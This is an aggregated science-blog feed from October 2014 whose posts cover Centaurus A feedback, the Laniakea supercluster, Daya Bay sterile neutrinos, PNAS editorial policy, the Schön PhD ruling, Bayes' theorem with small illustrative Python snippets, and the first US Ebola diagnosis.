Particle Physics Planet

October 02, 2014

astrobites - astro-ph reader's digest

MUSEing on positive feedback

Title: MUSE discovers perpendicular arcs in Cen A inner filament
Authors: S. Hamer, P. Salomé, F. Combes and Q. Salomé
First Author Institution: LERMA, Observatoire de Paris, UMR 8112 61, Av. de l’Observatoire, F-75014, Paris, France
Status: Submitted to Astronomy & Astrophysics

Figure 1. Centaurus A (NGC5128) is the largest extragalactic radio source projected on the sky and is at a distance of 3.8Mpc. Located in the constellation of Centaurus in the southern sky it can be seen with the naked eye in perfect conditions. Credit: ESO.


Both observations and theory show that galaxies can’t form stars on their own indefinitely – they need some mechanism to moderate star formation in order to match the evolutionary path that we know galaxies follow. Turbulence within the star-forming gas is needed to keep a galaxy ‘alive’: by mixing the available gas, denser pockets of cold hydrogen can form, which can eventually collapse and form stars. As soon as this mixing stops and the gas is allowed to settle, further star formation will not take place.

Supernova explosions send shock waves and energy propagating through the interstellar medium (ISM), which could produce enough turbulent mixing of the gas to self-regulate star formation. But radio jets streaming from active black holes could be an even stronger source of turbulence with the same effect. This is known as positive feedback, and it occurs on a local scale (unlike the better documented negative feedback, which acts to decrease star formation rates globally across a galaxy). Although the mechanism responsible for this turbulent mixing (supernovae, black holes or something else entirely) is uncertain, what is certain is that simulations which do not contain such a prescription produce galaxies which are on average too small to match observations.

The authors of this paper search for observational evidence of this interaction between radio jets and the ISM by observing NGC5128 (Centaurus A), a giant elliptical galaxy hosting a massive black hole (~20 million solar masses) and large radio lobes extending over 250 kiloparsecs (see Figure 1). Using the MUSE spectrograph on the VLT in Chile, they searched for the broadening of emission lines along optical structures aligned with the galaxy’s radio jets. Such broadening would indicate places where the gas has been shocked and therefore heated, providing energy for turbulent mixing; these areas are therefore the precursors of star-forming birth clouds.

Figure 2 shows the results of observing the first Balmer line, Hα, in emission from Centaurus A. The left panels show the flux of this line and the right panels show how broad the line is in each area. If an emission line is broadened, it means that the gas emitting this wavelength of light is moving chaotically, so Doppler shifts both lengthen and shorten the wavelength of the narrow emission line, giving a broader line feature in the spectrum.
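The wavelength-to-velocity conversion behind this is just the Doppler relation. A minimal illustrative sketch (the numbers are assumptions, not from the paper):

```python
# Illustrative sketch (numbers assumed, not from the paper): converting an
# observed H-alpha line width into a velocity width using the Doppler
# relation delta_lambda / lambda_rest = v / c.

H_ALPHA_REST_NM = 656.28   # rest wavelength of H-alpha, nanometres
C_KM_S = 299_792.458       # speed of light, km/s

def velocity_width(delta_lambda_nm, rest_nm=H_ALPHA_REST_NM):
    """Velocity broadening (km/s) implied by a line width in nanometres."""
    return C_KM_S * delta_lambda_nm / rest_nm

# A broadening of ~0.9 nm corresponds to roughly 400 km/s, the order of
# magnitude quoted for the shocked gas later in the post.
print(round(velocity_width(0.9), 1))
```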

One of the immediately noticeable features of these maps is a strange arc-like structure (visible as the dark blue structure in the second panel of Figure 2) which is entirely separate from the main filamentary structures and opposite in curvature to the optical stellar shell surrounding the central galaxy. The authors rule out the theory that these arcs are part of a separate filament feeding gas down onto the main structure, since that would produce a smoother velocity transition (calculated from the difference between the broadness of the two emission lines, Hα – [NII]) between the arc and filament than is seen in the third panel of Figure 2. They instead muse that these arcs are backflows of gas from the active black hole outburst, formed when fast-moving material ran into slower material at the front. Simulations show that this is entirely plausible; however, such a structure would only be visible for ~1 Myr, suggesting that the black hole activity in Centaurus A began relatively recently.

Figure 2: The first panel shows the Hα flux map of the main inner filament, and the second shows the same map with that area subtracted to reveal an arc-like structure in the background. The third panel shows Hα – [NII]; by comparing the broadness of two different emission lines ([NII] is a forbidden emission line of ionized nitrogen) we can work out how fast the gas is moving. The fourth panel shows the broadening of the Hα emission line around the edges of the clumps of the main filament. All four maps show the same region of the galaxy. Credit: Hamer et al. (2014).

The second most striking result shown by the maps in Figure 2 is the thin region of highly broadened Hα emission around the edges of the clumpy main filamentary structure, which can be seen in the fourth panel. The broadened width of these lines (~400 km/s) agrees with the predictions of simulations of shock waves, suggesting that this clumpy filamentary structure is surrounded by a shell of gas which has interacted with the radio jet. These clumps are also extremely bright in the UV (as observed by GALEX), suggesting that the gas in the filament is forming stars – possibly as a direct result of this interaction with the radio jet. The authors therefore claim that this is direct observational evidence for positive feedback from the active black hole in Centaurus A.

If their interpretation is correct, the black hole could spur star formation on Centaurus A for hundreds of millions of years to come.



by Becky Smethurst at October 02, 2014 12:43 PM

The Great Beyond - Nature blog

PNAS narrows pathway to publication

One door to publishing in the Proceedings of the National Academy of Sciences (PNAS) has slammed shut. In an editorial this week, Editor-in-Chief Inder Verma said the prestigious US journal will no longer accept submitted papers that come with a pre-arranged editor (who is a member of the National Academy of Sciences).

The journal formalized this publication track in 2010, when it eliminated so-called “communicated” papers, which allowed academy members to usher papers from non-member colleagues through to publication. Papers with pre-arranged editors (known in PNAS-speak as “PE”) went through peer review, but the process was shepherded by an academy member pre-chosen by the author of the paper, rather than an editor selected by the journal. The intention was to encourage papers that were interdisciplinary or ‘ahead of their time’, and deserving of special attention. According to Verma’s letter: “The PE process was intended to be used on rare occasions but, since we formalized the PE process, more than 11,000 papers have been submitted by authors with a PE designation. Although we are certain that some of these papers truly needed special attention, the vast majority likely did not, and therefore we are discontinuing the PE process as of October 1, 2014.” Papers already submitted through that track won’t be affected by the change.

Nature noted Verma’s desire to eliminate pre-arranged editor submissions in a recent feature on PNAS (“The Inside Track”): “One in five direct submissions published in 2013 used a prearranged editor, and the acceptance rate for these papers is higher than for other direct submissions. ‘More and more the playing field will be levelled,’ says Verma.” That story focused on PNAS’s “contributed” path to publication, which lets academy members publish up to four papers per year using peer reviewers they select (whose comments the members can take or leave). As our story noted, many members rarely or never use the “contributed” track, while just a handful make regular use of it. This publication track remains unchanged, so academy members don’t need to make an “Indiana Jones” style dash through a closing door just yet.

hat tip: In the Pipeline

by Ewen Callaway at October 02, 2014 12:16 PM

The Great Beyond - Nature blog

UK and US universities slip in latest rankings

The California Institute of Technology was ranked #1 university in the world by the Times Higher Education, but overall the US lost three institutions from the top-200.

Bob Paz/Caltech

Universities in both the United States and United Kingdom slipped slightly down the tables in the latest Times Higher Education World University Rankings 2014-15, released on 1 October.

Both countries still dominate the rankings, with 103 of the top 200 institutions — and the totality of the top 12 spots — between them. The California Institute of Technology in Pasadena topped the table for the fourth year in a row (see Top 10 below). But overall the US lost three institutions from the top 200, and the UK lost two. According to THE, over four years the US has suffered the largest total loss in rankings position.

Meanwhile universities on the Asian continent continued to rise within the ranking, with China, Russia and Hong Kong gaining one top 200 representative each, and Turkey gaining three. German universities also increased their representation, with two new top-200 entrants.

The rankings, which were revamped in 2010, try to measure an institution’s research, teaching, knowledge transfer and international outlook, based on 13 criteria, which include a reputation survey, subject-averaged citation impact, income from industry and international co-authorship.

Flaws in such rankings are well documented (see ‘University rankings ranked’), but the annual tables continue to prove popular among students and policymakers. The THE results come on the back of the QS World University Rankings, which painted a rosier picture for UK universities.

2014-15 Rank | 2013-14 Rank | Institution name
1  | 1  | California Institute of Technology
2  | 2  | Harvard University
3  | 2  | University of Oxford
4  | 4  | Stanford University
5  | 7  | University of Cambridge
6  | 5  | Massachusetts Institute of Technology
7  | 6  | Princeton University
8  | 8  | University of California, Berkeley
9  | 10 | Imperial College London

by Elizabeth Gibney at October 02, 2014 11:40 AM

Christian P. Robert - xi'an's og

plenty of new arXivals!

Here are some entries of potential interest I spotted in the past few days, but which I will not have enough time to comment on:

  • arXiv:1410.0163: Instrumental Variables: An Econometrician’s Perspective by Guido Imbens
  • arXiv:1410.0123: Deep Tempering by Guillaume Desjardins, Heng Luo, Aaron Courville, Yoshua Bengio
  • arXiv:1410.0255: Variance reduction for irreversible Langevin samplers and diffusion on graphs by Luc Rey-Bellet, Konstantinos Spiliopoulos
  • arXiv:1409.8502: Combining Particle MCMC with Rao-Blackwellized Monte Carlo Data Association for Parameter Estimation in Multiple Target Tracking by Juho Kokkala, Simo Särkkä
  • arXiv:1409.8185: Adaptive Low-Complexity Sequential Inference for Dirichlet Process Mixture Models by Theodoros Tsiligkaridis, Keith W. Forsythe
  • arXiv:1409.7986: Hypothesis testing for Markov chain Monte Carlo by Benjamin M. Gyori, Daniel Paulin
  • arXiv:1409.7672: Order-invariant prior specification in Bayesian factor analysis by Dennis Leung, Mathias Drton
  • arXiv:1409.7458: Beyond Maximum Likelihood: from Theory to Practice by Jiantao Jiao, Kartik Venkat, Yanjun Han, Tsachy Weissman
  • arXiv:1409.7419: Identifying the number of clusters in discrete mixture models by Cláudia Silvestre, Margarida G. M. S. Cardoso, Mário A. T. Figueiredo
  • arXiv:1409.7287: Identification of jump Markov linear models using particle filters by Andreas Svensson, Thomas B. Schön, Fredrik Lindsten
  • arXiv:1409.7074: Variational Pseudolikelihood for Regularized Ising Inference by Charles K. Fisher

Filed under: Statistics, University life Tagged: arXiv, Bayesian Analysis, Ising, Monte Carlo methods, simulation, Statistics

by xi'an at October 02, 2014 11:28 AM

Tommaso Dorigo - Scientificblogging

Publish, Blog, Tweet: Furthering One's Career In Science Today
Today and tomorrow I am attending a workshop in Padova with the same title as this post (but held in Italian). If you know the language and are interested in the topic, live streaming is available at the workshop's site, here:

My contribution is titled "The researcher who blogs: social value, opportunities, challenges, anathemas". I am speaking tomorrow at 10AM (Rome time zone - it's 1AM in California!). I will post some extracts from my slides on the blog later on...

The workshop should be interesting, as many renowned science communicators are attending, and the topics on the agenda are attractive. Give it a look if you like...

by Tommaso Dorigo at October 02, 2014 10:57 AM

Peter Coles - In the Dark

The Curse of Assessment-led Teaching

Yesterday I took part in a University Teaching and Learning Strategy meeting that discussed, among other things, how to improve the feedback on student assessments in order to help them learn better. It was an interesting meeting, involving academics, administrative staff and representatives of the Students Union, that generated quite a few useful ideas. Looking through my back catalogue I realise that around this time last year I was at a similar event based in the School of Mathematical and Physical Sciences at the University of Sussex, of which I am Head.

Positive though yesterday’s discussion was, it didn’t do anything to dissuade me from a long-held view that the entire education system holds back the students’ ability to learn by assessing them far too much. One part of the discussion was about trying to pin down essentially what is meant by “Research-led Teaching” which is what we’re supposed to be doing at universities. In my view too much teaching is not really led by research at all, but mainly driven by assessment. The combination of the introduction of modular programmes and the increase of continuously assessed coursework has led to a cycle of partial digestion and regurgitation that involves little in the way of real learning and certainly nothing like the way research is done.

I’m not going to argue for turning the clock back entirely, but for the record my undergraduate degree involved no continuous assessment at all (apart from a theory project I opted for in my final year). Having my entire degree result based on the results of six three-hour unseen examinations in the space of three days is not an arrangement I can defend, but note that despite the lack of continuous assessment I still spent less time in the examination hall than present-day students.

That’s not to say I didn’t have coursework. I did, but it was formative rather than summative; in other words it was for the student to learn about the subject, rather than for the staff to learn about the student. I handed in my stuff every week, it was marked and annotated by a supervisor, then returned and discussed at a supervision.

People often tell me that if a piece of coursework “doesn’t count” then the students won’t do it. There is an element of truth in that, of course. But I had it drummed into me that the only way really to learn my subject (Physics) was by doing it. I did all the coursework I was given because I wanted to learn and I knew that was the only way to do it.

The very fact that coursework didn’t count for assessment made the feedback written on it all the more useful when it came back because if I’d done badly I could learn from my mistakes without losing marks. This also encouraged me to experiment a little, such as using a method different from that suggested in the question. That’s a dangerous strategy nowadays, as many seem to want to encourage students to behave like robots, but surely we should be encouraging students to exercise their creativity rather than simply follow the instructions? The other side of this is that more challenging assignments can be set, without worrying about what the average mark will be or what specific learning outcome they address.

I suppose what I’m saying is that the idea of Learning for Learning’s Sake, which is what in my view defines what a university should strive for, is getting lost in a wilderness of modules, metrics, percentages and degree classifications. We’re focussing too much on those few aspects of the educational experience that can be measured, ignoring the immeasurable benefit (and pleasure) that exists for all humans in exploring new ways to think about the world around us.

by telescoper at October 02, 2014 07:56 AM

astrobites - astro-ph reader's digest

The Boundaries of the Supercluster

This paper gives new precision to the term “galaxy supercluster”. With a clear definition in hand, the authors also trace the bounds of our home supercluster, naming it “Laniakea”, or “Immense Heaven” in Hawaiian.


Figure 1: From the study by de Lapparent et al. 1986. Observed velocity (from the redshift) vs. right ascension. The dots represent 1100 galaxies.

Maps of the universe on scales of hundreds of megaparsecs have previously been drawn from redshift surveys of large numbers of galaxies. Each galaxy is located in three-dimensional space by its projection on our sky and its redshift, which serves as a rough measure of its distance from us. One such project produced this amazing slice of the universe almost three decades ago (Fig. 1). Each dot represents a galaxy, and the whole map gave us a first sense that nearby structure is dominated by filaments and voids.

But Tully and colleagues were occupied by a slightly different problem than mapping galaxies. They wanted to map out the distribution of all matter in the nearby universe, including the dark matter. There’s a significant difference. For example, in the case of the famous Bullet cluster of galaxies, the dark matter and the visible matter don’t line up. And dark matter is much more prevalent than visible matter, maybe five times as prevalent (divide the cold dark matter density of the universe by the baryon density, catalogued here).

To map all the matter in the universe, Tully and colleagues used over 8000 galaxies as gravitational probes. If a galaxy was moving with respect to the normal cosmological flow, they ascribed the peculiar velocity to a gravitational attraction. Deep surveys show us that all distant galaxies are flowing away from us, the universe is expanding. But within that bulk expansion, swarms of galaxies are getting tugged by their host superclusters. A map of the peculiar velocities of nearby galaxies, therefore, will reveal which galaxies belong to our supercluster, and which are being tugged elsewhere.


Figure 2: From Tully et al. 2014. This shows a single plane (perpendicular to the supergalactic z-axis) sliced through the center of the nearby universe. The blue dot is home. Each white dot is a galaxy. The colors represent reconstructed matter densities: blue is less matter, green is more. The white streamlines are traced through the field of peculiar velocities; they reveal the ‘drainage basin’ of our local supercluster. An orange line represents the boundary between diverging flows. Nearby superclusters are labeled.

To determine a peculiar radial velocity, the authors found a distance measurement using brightness, then subtracted the cosmological flow (that is, Hubble’s constant multiplied by the distance) from the observed velocity (that is, the redshift). All the distance-measuring techniques they used compare an object’s brightness to an estimate of its actual light output. Some techniques focus on an object in the galaxy (for example a Cepheid variable or a Type Ia supernova) or a sub-population of stars. Other techniques use the galaxy itself: its inherent ‘graininess’, its rotation rate, or a relationship between its size and range of stellar velocities. To construct their massive catalog of 8000 peculiar radial velocities they used all of these tools.
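The subtraction itself is simple. A minimal sketch (the Hubble constant value and galaxy numbers are assumptions for illustration, not the authors' pipeline):

```python
# Minimal sketch (assumed H0 value and toy numbers, not the authors'
# pipeline): the peculiar radial velocity is the observed recession
# velocity minus the smooth cosmological flow, v_pec = v_obs - H0 * d.

H0 = 70.0  # Hubble constant in km/s/Mpc (a conventional round value)

def peculiar_velocity(v_obs_km_s, distance_mpc, h0=H0):
    """Observed velocity minus the Hubble flow at the galaxy's distance."""
    return v_obs_km_s - h0 * distance_mpc

# A galaxy at 50 Mpc receding at 3800 km/s: the Hubble flow accounts for
# 3500 km/s, leaving a peculiar velocity of +300 km/s.
print(peculiar_velocity(3800.0, 50.0))
```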

With a map of peculiar radial velocities for these 8000 galaxies extending out to hundreds of megaparsecs, the authors reconstruct the most likely three-dimensional velocity field, assuming no swirls in the flow (an assumption consistent with the standard cosmological model on such large scales). The underlying peculiar velocity field describes the tiny gravitationally-perturbed motions of galaxies after subtracting out cosmological expansion. Our local “basin of attraction” is the region containing all the galaxies that would contract to a single point, if we were to neglect the dominant expansion. The authors define this region as our home supercluster, Laniakea.

This is the first time the boundaries of the local supercluster have been defined. Here’s a video describing their method and showing the resulting map of the nearby universe. A slice of this three-dimensional map is shown above.

by Brett Deaton at October 02, 2014 12:25 AM

October 01, 2014

Christian P. Robert - xi'an's og

Approximate Bayesian Computation in state space models

While it took quite a while (!), with several visits by three of us to our respective antipodes, incl. my exciting trip to Melbourne and Monash University two years ago, our paper on ABC for state space models was arXived yesterday! Thanks to my coauthors, Gael Martin, Brendan McCabe, and Worapree Maneesoonthorn, I am very glad of this outcome and of the new perspective on ABC it produces. For one thing, it concentrates on the selection of summary statistics from a more econometric than usual point of view, defining asymptotic sufficiency in this context and demonstrating that both asymptotic sufficiency and Bayes consistency can be achieved when using maximum likelihood estimators of the parameters of an auxiliary model as summary statistics. In addition, the proximity to (asymptotic) sufficiency yielded by the MLE is replicated by the score vector. Using the score instead of the MLE as a summary statistic allows for huge gains in terms of speed. The method is then applied to a continuous time state space model, using as auxiliary model an augmented unscented Kalman filter. We also found in the various state space models tested therein that the ABC approach based on the marginal [likelihood] score was performing quite well, including with respect to Fearnhead’s and Prangle’s (2012) approach… I like the idea of using such a generic object as the unscented Kalman filter for state space models, even when it is not a particularly accurate representation of the true model. Another appealing feature of the paper is in the connections made with indirect inference.
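For readers new to ABC: the paper's method uses the score of an auxiliary model as the summary statistic, but the core ABC idea can be sketched much more simply with a generic rejection sampler on a toy Gaussian model (all names and numbers below are illustrative assumptions, not the authors' code):

```python
# Generic ABC rejection sketch, NOT the authors' algorithm: accept a prior
# draw of theta whenever a summary statistic of data simulated under theta
# is close to the observed summary. Toy model: N(theta, 1) with the sample
# mean as the summary statistic.
import random

random.seed(0)

def simulate(theta, n=100):
    """Toy model: n i.i.d. draws from N(theta, 1)."""
    return [random.gauss(theta, 1.0) for _ in range(n)]

def summary(data):
    """Summary statistic: the sample mean."""
    return sum(data) / len(data)

observed = simulate(2.0)   # pretend data with true theta = 2
s_obs = summary(observed)

accepted = []
for _ in range(5000):
    theta = random.uniform(-5.0, 5.0)                # prior draw
    if abs(summary(simulate(theta)) - s_obs) < 0.1:  # tolerance check
        accepted.append(theta)

# The accepted draws approximate the posterior; their mean should sit
# close to the true value 2.
print(len(accepted), round(sum(accepted) / len(accepted), 2))
```

A good summary statistic is what makes this work at all, which is why the paper's focus on (asymptotically) sufficient summaries matters.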

Filed under: Statistics, Travel, University life Tagged: ABC, indirect inference, Kalman filter, marginal likelihood, Melbourne, Monash University, score function, state space model

by xi'an at October 01, 2014 10:14 PM

Symmetrybreaking - Fermilab/SLAC

Daya Bay places new limit on sterile neutrinos

The Daya Bay experiment, famous for studying neutrino mixing, is branching into a new area of neutrino physics.

The experiment that produced the latest big discovery about ghostly particles called neutrinos is trying its hand at solving a second neutrino mystery.

The Daya Bay Reactor Neutrino Experiment reported in Physical Review Letters today that it has narrowed the region in which the most elusive kind of neutrino, the sterile neutrino, might exist.

Located in southern China, the experiment studies low-energy neutrinos and their antimatter counterparts streaming from the nearby Daya Bay and Ling Ao nuclear power plants.

The primary goal of building the Daya Bay experiment was to better understand how neutrinos oscillate, or change from one type to another. Daya Bay scientists accomplished this in March 2012 with the discovery of a parameter called theta-13.

In the process they collected the most data on antineutrinos from a nuclear reactor of any experiment in the world.

“We have multiple reactors as well as detectors,” says co-leader of the Daya Bay experiment Kam-Biu Luk of Lawrence Berkeley National Laboratory and the University of California, Berkeley. “As a result we are in a very good position to search for sterile neutrinos, particularly in a region that hasn’t been explored before.”

Neutrinos are known to oscillate between three types. The question Daya Bay set out to answer was whether there is a fourth type that mixes with the other three. Sterile neutrinos have yet to be discovered, possibly because they interact with matter less than any other type of neutrino—a characteristic that has made them candidate dark matter particles.

In today’s result, Daya Bay scientists ruled out the existence of these neutrinos at the lowest masses ever probed.

“We have no idea where the sterile neutrino is hiding, if it exists,” Luk says. “Therefore it is very important to have many types of experiments search in different regions.”

The Daya Bay experiment is managed at the Institute of High Energy Physics in China, and its US contingent is based at Lawrence Berkeley National Laboratory and Brookhaven National Laboratory.

Daya Bay scientists will likely release a second sterile neutrino study only after they have finished collecting data in 2017, Luk says.


Like what you see? Sign up for a free subscription to symmetry!

by Kathryn Jepsen at October 01, 2014 09:20 PM

arXiv blog

Relationship Mining on Twitter Shows How Being Dumped Hurts More than Dumping

The first data mining study of romantic relationships on Twitter reveals that social networks undergo the equivalent of earthquakes after break ups.

“The breakup of a romantic relationship is one of the most distressing experiences one can go through in life.” So begin Venkata Garimella at Aalto University in Finland and a couple of pals, with more than a hint of misty-eyed regret. These guys have more insight than most thanks to their work studying the break-up of romantic relationships through the medium of Twitter.

October 01, 2014 08:15 PM

astrobites - astro-ph reader's digest

Two Weeks Left to Apply to Write for Astrobites

This is a reminder that there are still two weeks left to apply to write for Astrobites!

We are seeking new graduate students to join the Astrobites collaboration. Applicants must be current graduate students. The deadline for applications is 15 October. Please email if you have any questions.

The application consists of a sample Astrobite and two short essays. The application and instructions can be found and submitted at

by Astrobites at October 01, 2014 07:02 PM

Emily Lakdawalla - The Planetary Society Blog

Happy Fiscal Year 2015! Though NASA Still Doesn't Have a Budget
Congress passed a stopgap spending bill before taking off to campaign for re-election, keeping NASA's 2015 budget in limbo for another two months.

October 01, 2014 04:25 PM

Emily Lakdawalla - The Planetary Society Blog

Mars Orbiter Mission activates all science instruments as NASA, ISRO form joint Mars working group
Mars Orbiter Mission (MOM) began its science activities fully on Wednesday with all five science instruments being activated. And on Tuesday, an ISRO-NASA Mars working group was formed which will "seek to identify and implement scientific and technological goals that NASA and ISRO have in common regarding Mars exploration."

October 01, 2014 04:19 PM

The Great Beyond - Nature blog

Schön loses last appeal against PhD revocation

Jan Hendrik Schön

Materials Research Society

The German Federal Constitutional Court in Karlsruhe confirmed on 1 October that the University of Constance was within its rights to revoke the PhD of physicist Jan Hendrik Schön, who was dismissed in 2002 from Bell Laboratories in Murray Hill, New Jersey, for falsifying research results.

Schön was still in his early 30s when he was dismissed after being found guilty of 16 counts of scientific misconduct.

He had worked in nanotechnology and had been considered a star scientist, able to create transistors out of single molecules. He published numerous papers in rapid succession in high-profile journals, including Nature and Science.

Two years later, following local investigations in Germany, the University of Constance decided to revoke the PhD it had awarded to Schön in 1998. The university said that although it had no evidence that Schön engaged in wrongdoing during his PhD work, he no longer merited the degree because he had brought science into disrepute.

Schön has appealed that decision through different courts, and in 2010 a court in Freiburg ruled that he should get to keep his graduate degree. But the Federal Constitutional Court has the last word, and the university’s decision stands.


by alison abbott at October 01, 2014 02:44 PM

Peter Coles - In the Dark

Bayes, Laplace and Bayes’ Theorem

A couple of interesting pieces have appeared which discuss Bayesian reasoning in the popular media. One is by Jon Butterworth in his Grauniad science blog and the other is a feature article in the New York Times. I’m in early today because I have an all-day Teaching and Learning Strategy Meeting, so before I disappear for that I thought I’d post a quick bit of background.

One way to state Bayes’ Theorem is

P(B|AC) = P(A|BC) P(B|C) / P(A|C)
where I refer to three logical propositions A, B and C and the vertical bar “|” denotes conditioning, i.e. P(A|B) means the probability of A being true given the assumed truth of B; “AB” means “A and B”, etc. Many versions of this, including the one in Jon Butterworth’s blog, exclude the third proposition and refer to A and B only. I prefer to keep an extra one in there to remind us that every statement about probability depends on information either known or assumed to be known; any proper statement of probability requires this information to be stated clearly and used appropriately but sadly this requirement is frequently ignored.
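The conditioning can be made concrete with a quick numerical check (my own toy example, not from the post) that the three-proposition form holds on a small joint distribution:

```python
# Toy numerical check that Bayes' theorem in its three-proposition form,
# P(B|AC) = P(A|BC) P(B|C) / P(A|C), holds. C stands for the assumed
# background information; the joint probabilities below are arbitrary
# numbers that sum to 1.
joint = {
    (True, True): 0.20,   # P(A and B | C)
    (True, False): 0.30,
    (False, True): 0.10,
    (False, False): 0.40,
}

p_a = joint[(True, True)] + joint[(True, False)]   # P(A|C)
p_b = joint[(True, True)] + joint[(False, True)]   # P(B|C)
p_a_given_bc = joint[(True, True)] / p_b           # P(A|BC)

p_b_given_ac_direct = joint[(True, True)] / p_a    # straight from the joint
p_b_given_ac_bayes = p_a_given_bc * p_b / p_a      # via Bayes' theorem

# Both routes give the same answer, as the theorem requires.
print(round(p_b_given_ac_direct, 6), round(p_b_given_ac_bayes, 6))
```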

Although this is called Bayes’ theorem, the general form of it as stated here was actually first written down not by Bayes, but by Laplace. What Bayes did was derive the special case of this formula for “inverting” the binomial distribution. This distribution gives the probability of x successes in n independent “trials” each having the same probability of success, p; each “trial” has only two possible outcomes (“success” or “failure”). Trials like this are usually called Bernoulli trials, after Daniel Bernoulli. If we ask the question “what is the probability of exactly x successes from the possible n?”, the answer is given by the binomial distribution:

P_n(x|n,p)= C(n,x) p^x (1-p)^{n-x}


where

C(n,x) = \frac{n!}{x!(n-x)!}

is the number of distinct combinations of x objects that can be drawn from a pool of n.

You can probably see immediately how this arises. The probability of x consecutive successes is p multiplied by itself x times, or p^x. The probability of (n-x) successive failures is similarly (1-p)^{n-x}. These two terms together therefore give the probability of a particular sequence with exactly x successes (since there must be n-x failures). The combinatorial factor in front takes account of the fact that the ordering of successes and failures doesn’t matter.

The binomial distribution applies, for example, to repeated tosses of a coin, in which case p is taken to be 0.5 for a fair coin. A biased coin might have a different value of p, but as long as the tosses are independent the formula still applies. The binomial distribution also applies to problems involving drawing balls from urns: it works exactly if the balls are replaced in the urn after each draw, but it also applies approximately without replacement, as long as the number of draws is much smaller than the number of balls in the urn. I leave it as an exercise to calculate the expectation value of the binomial distribution, but the result is not surprising: E(X)=np. If you toss a fair coin ten times the expectation value for the number of heads is 10 times 0.5, which is five. No surprise there. After another bit of maths, the variance of the distribution can also be found. It is np(1-p).
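The formulas above are easy to verify numerically; a short illustrative sketch computes the binomial pmf and checks that the expectation and variance come out as np and np(1-p) for ten tosses of a fair coin:

```python
# Numerical check (illustrative) of the binomial formulas in the text:
# the pmf C(n,x) p^x (1-p)^(n-x), expectation np and variance np(1-p),
# for ten tosses of a fair coin.
from math import comb

def binomial_pmf(x, n, p):
    """Probability of exactly x successes in n independent trials."""
    return comb(n, x) * p**x * (1 - p)**(n - x)

n, p = 10, 0.5
mean = sum(x * binomial_pmf(x, n, p) for x in range(n + 1))
var = sum((x - mean) ** 2 * binomial_pmf(x, n, p) for x in range(n + 1))

# Expectation should be np = 5 and variance np(1-p) = 2.5.
print(round(mean, 6), round(var, 6))
```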

So this gives us the probability of x given a fixed value of p. Bayes was interested in the inverse of this result, the probability of p given x. In other words, Bayes was interested in the answer to the question “If I perform n independent trials and get x successes, what is the probability distribution of p?”. This is a classic example of inverse reasoning, in that it involved turning something like P(A|BC) into something like P(B|AC), which is what is achieved by the theorem stated at the start of this post.
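To make the inverse problem concrete: with a uniform prior on p, Bayes’ theorem turns the binomial likelihood into a Beta(x+1, n-x+1) posterior for p. The following sketch is my illustration of that result, not Bayes’ own construction:

```python
from math import comb

def posterior_density(p, x, n):
    """Posterior for p under a uniform prior: proportional to the
    binomial likelihood p^x (1-p)^(n-x). The normalising constant
    (n+1) * C(n, x) makes this the Beta(x+1, n-x+1) density."""
    return (n + 1) * comb(n, x) * p**x * (1 - p)**(n - x)

# 7 successes in 10 trials: the posterior mean is (x+1)/(n+2),
# which is Laplace's "rule of succession"
x, n = 7, 10
post_mean = (x + 1) / (n + 2)

# Numerical check that the posterior density integrates to one
grid = [i / 10000 for i in range(10001)]
area = sum(posterior_density(p, x, n) for p in grid) / 10000
print(post_mean)
```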

Bayes got the correct answer for his problem, eventually, but by very convoluted reasoning. In my opinion it is quite difficult to justify the name Bayes’ theorem based on what he actually did, although Laplace did specifically acknowledge this contribution when he derived the general result later, which is no doubt why the theorem is always named in Bayes’ honour.


This is not the only example in science where the wrong person’s name is attached to a result or discovery. Stigler’s Law of Eponymy strikes again!

So who was the mysterious mathematician behind this result? Thomas Bayes was born in 1702, son of Joshua Bayes, who was a Fellow of the Royal Society (FRS) and one of the very first nonconformist ministers to be ordained in England. Thomas was himself ordained and for a while worked with his father in the Presbyterian Meeting House in Leather Lane, near Holborn in London. In 1720 he was a minister in Tunbridge Wells, in Kent. He retired from the church in 1752 and died in 1761. Thomas Bayes didn’t publish a single paper on mathematics in his own name during his lifetime but was elected a Fellow of the Royal Society (FRS) in 1742.

The paper containing the theorem that now bears his name was published posthumously in the Philosophical Transactions of the Royal Society of London in 1763. In his great Philosophical Essay on Probabilities Laplace wrote:

Bayes, in the Transactions Philosophiques of the Year 1763, sought directly the probability that the possibilities indicated by past experiences are comprised within given limits; and he has arrived at this in a refined and very ingenious manner, although a little perplexing.

The reasoning in the 1763 paper is indeed perplexing, and I remain convinced that the general form we now refer to as Bayes’ Theorem should really be called Laplace’s Theorem. Nevertheless, Bayes did establish an extremely important principle that is reflected in the title of the New York Times piece I referred to at the start of this post. In a nutshell, this is that probabilities of future events can be updated on the basis of past measurements or, as I prefer to put it, “one person’s posterior is another’s prior”.
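“One person’s posterior is another’s prior” can be checked directly with the conjugate Beta-binomial update: processing the data in two batches, with yesterday’s posterior serving as today’s prior, gives exactly the same answer as processing it all at once. A minimal sketch (my notation, not the post’s):

```python
def update(prior, successes, failures):
    """Beta(a, b) prior + binomial data -> Beta(a + s, b + f) posterior."""
    a, b = prior
    return (a + successes, b + failures)

flat = (1, 1)  # uniform Beta(1, 1) prior

# All the data at once: 7 successes, 3 failures
all_at_once = update(flat, 7, 3)

# The same data in two batches: the first posterior becomes the second prior
batch1 = update(flat, 4, 1)
batch2 = update(batch1, 3, 2)

print(all_at_once, batch2)  # both (8, 4)
```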




by telescoper at October 01, 2014 07:35 AM

September 30, 2014

The Great Beyond - Nature blog

First US Ebola case diagnosed

A man has been diagnosed with Ebola virus disease in Dallas, Texas.

The man diagnosed with the illness on 30 September is the first in the United States, and the first person ever diagnosed outside Africa with the Zaire species of Ebola virus, which has killed more than 3,000 people in Africa in the current outbreak. A handful of Ebola patients have been treated in the United States during the current outbreak after being diagnosed with the disease in Africa.

The patient travelled from Liberia to the United States on a flight that landed on 20 September, began experiencing symptoms on 24 September, sought care on 26 September and was admitted to an isolation ward at Texas Health Presbyterian Hospital Dallas on 28 September. The US Centers for Disease Control and Prevention (CDC) in Atlanta and a state health department lab in Austin, Texas, both diagnosed Ebola in samples from the patient.

CDC director Thomas Frieden said that the patient was in the United States visiting family and did not appear to be involved in the Ebola outbreak response in Africa.

Frieden said that public-health officials began tracing the contacts of the individual today, and do not think that passengers who were on his flight are at risk of infection with Ebola. Frieden said that officials have identified “several family members and one or two community members” who had contact with the patient after he became sick and therefore may have been exposed to the virus. Officials will monitor them for 21 days, the window in which symptoms would appear if they have been infected with Ebola.

“Ebola doesn’t spread until someone gets sick, and he didn’t get sick until four days after he got off the airplane, so we do not believe there was any risk to anyone who was on the flight,” Frieden said.

